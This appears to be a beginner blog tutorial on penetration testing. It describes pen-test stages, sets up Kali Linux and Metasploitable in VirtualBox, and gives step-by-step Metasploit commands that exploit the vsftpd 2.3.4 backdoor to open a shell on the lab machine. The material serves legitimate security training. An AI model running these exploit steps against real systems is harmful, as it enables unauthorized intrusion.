Open in app

Sign in

Write

Sign in

Getting Started with Penetration Testing using Metasploit

Contents

Anurag Kulkarni
6 min readJan 2, 2022
  1. What is Penetration Testing?
  2. Stages of Penetration Testing
  3. Methods of Penetration Testing
  4. Introduction to VirtualBox
  5. Introduction to Kali Linux
  6. Introduction to Metasploitable

What is Penetration Testing?

Penetration Testing is also known as Pen Testing or Ethical Hacking. A pen test is nothing but a simulated cyber attack or a security exercise performed by an expert to find and exploit vulnerabilities in a computer system. This is generally carried out to search for weak points in a system’s defences which hackers could take advantage of.

Stages of Penetration Testing

  1. Planning and Reconnaissance:-
  • Define the scope and goal of the test.
  • Gather all the required information about the target system to understand its working and vulnerabilities.

2. Scanning:-

  • This step is about understanding how the target system will respond to your intrusion.
  • Application’s code can be examined to analyse how it will react to intrusion or manipulation.

3. Gaining Access:-

  • This step includes uncovering target’s vulnerabilities. Attacks like Backdoor Entry, Cross-site Scripting can be performed to gain access to the target system.
  • Experts then try to exploit these vulnerabilities further by escalating privileges, stealing data, intercept traffic to check damage that can be caused.

4. Maintaining Access:-

  • This step checks whether the vulnerability can be used to gain persistent access to the target system.
  • This is to imitate persistent threats which often stay in system for months.

5. Analysis:-

  • This step includes preparing a report of all the vulnerabilities in the target system, data that was exposed and the amount of time the expert had control over the system.

Methods of Penetration Testing

  1. External Testing:-
  • This method targets the assets which are visible on the internet.
  • Example: Website, Email, Domain Name Servers (DNS), etc.

2. Internal Testing:-

  • This method is used to access an application behind the firewall, simulating an insider attack.

3. Blind Testing:-

  • In this method the Cyber Security Expert is just given the name of the target organisation by the security personnel.
  • This given an idea of how a real time attack will take place.

4. Double-blind Testing:-

  • In this method the security personnel doesn’t have any idea about the attack.
  • This helps simulate real world attacks.

5. Targeted Testing:-

  • In this method, Cyber Security Expert and the Security Personnel work together and keep each updated about the movements.

Introduction to Oracle VirtualBox

  • Oracle VirtualBox is simple, general virtualisation tool that allows us to run multiple operating systems virtually on our local machine.
  • Download Oracle VirtaulBox.
  • Download and Install Oracle VirtualBox according to your hardware and software configuration.

Introduction to Kali Linux

  • Kali Linux is an Open-source, Debian-based linux distribution that aims at advanced Penetration Testing and Security Auditing.
  • It has over 600 tools for Penetration Testing and Security Analysis.
  • Download Kali Linux.
  • Download Kali Linux for “Oracle Virtual Box”.

Installing Kali Linux on VirtualBox

Step 1:

  • Open VirtualBox.
  • You will have a blank left side division unlike me.

Step 2:

  • Click on the “Import” button.
  • From source select “Local File System” and then in the Files section choose the Kali Linux “.ova” file you just downloaded.

Step 3:

  • You will be shown an Appliance Setting’s page, let the settings remain as defaults.
  • Click “Import”.
  • You will get a Software Licence Agreement’s page, click “Agree”.
  • Wait till the importing is done.

Step 4:

  • Once the importing is finished, you will see a Kali Linux VM created in the right division.
  • Right Click and go to settings.
  • Go to the “Network” tab.
  • In the “Attached to” section select Host-only Adapter because we don’t want our VM on our own local network.
  • Click “OK”.

Step 5:

  • Go ahead and Double Click on the Kali Linux VM to boot into it.
  • The Login ID and the password both are “kali”.

Introduction to Metasploitable

  • Metasploitable is a vulnerable Linux Virtual Machine that is developed intentionally to conduct security trainings.
  • With Metasploit attacks can be practiced legally.
  • Download Metasploitable.

Installing Metasploitable on VirtualBox

Step 1:

  • Open VirtualBox.

Step 2:

  • Click on New.
  • Name the VM as Metasploitable2.
  • Select the Type as Linux.
  • Select the Version as Ubuntu (64-bit).

Step 3:

  • Select “Use an existing virtual hard disk file” and then choose the Metasploitable Image you have just downloaded.

Step 4:

  • Right click on the VM you just created and go to Settings.
  • Go to the Network section.
  • Change the Adapter type to “Host-only Adapter” because we don’t want our VM on our local network.
  • Click “Ok”.

Step 5:

  • Double click on the VM you just created.
  • For the first time it will take time to boot up.
  • The Login ID and the password both are “msfadmin”.

Preparing Metasploitable

Step 1:

  • Type in the command “ifconfig” to get the IP address of the Metasploitable machine.
  • The address next to “inet” is your IP address, note it down.

Step 2:

  • Create a file using the command “touch test.txt”.
  • Let’s write a message in that file.
  • Enter command “nano text.txt”.
  • Write some message for example: “This file has been written in Metasploitable”.
  • Press “Ctrl + X” to Exit.
  • Type in “y” to save modified buffer and then press Enter.

Introduction to Metasploit

  • Metasploit is a Ruby-based penetration testing platform.
  • It contains various tools for testing security vulnerabilities, enumerate networks, execute attacks and avoid detection.
  • It provides an environment for penetration testing and exploit development.

Getting to know the Attack

  • VSFTD is the default FTP server for Unix-like systems as well as Linux systems like Ubuntu, CentOS, Fedora, etc.
  • In June 2011, a backdoor was introduced into the master site of VSFTPD Version 2.3.4 which allowed connection to the server without authentication.
  • We are going to the use this vulnerability to make a “Backdoor Entry” into the metasploitable machine.

Getting Started with the Attack

Step 1:

  • Go ahead and open a Terminal window in your Kali Linux VM.
  • Type in command “msfconsole” to run the Metasploit Framework.

Step 2:

  • To get the location of the exploit, enter command “search vsftpd”.
  • To set up the exploit type “use exploit/unix/vsftpd_234_backdoor”.

Step 3:

  • Enter “show options” command to check the default settings for the attack.
  • We will have to point the RHOST to out victim machine which is nothing but the Metasploitable.
  • Enter Command “set RHOST <ip address>”. Enter the IP address of your Metasploitable machine.

Step 4:

  • Enter “exploit” to start the attack.
  • You will notice that we have now been connected to the Metasploitable machine and a command shell has opened.

Conclusion

As a result, we have seen what is penetration testing, what are its stages and methods. We also got familiar with Oracle VirtualBox and installed two VMs on it. At last, we practiced a simple backdoor entry attack using Metasploit.

Penetration Testing
Virtualbox
Kali Linux
Metasploit Framework
Metasploitable2

--

--

Anurag Kulkarni

Written by Anurag Kulkarni

6 Followers

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams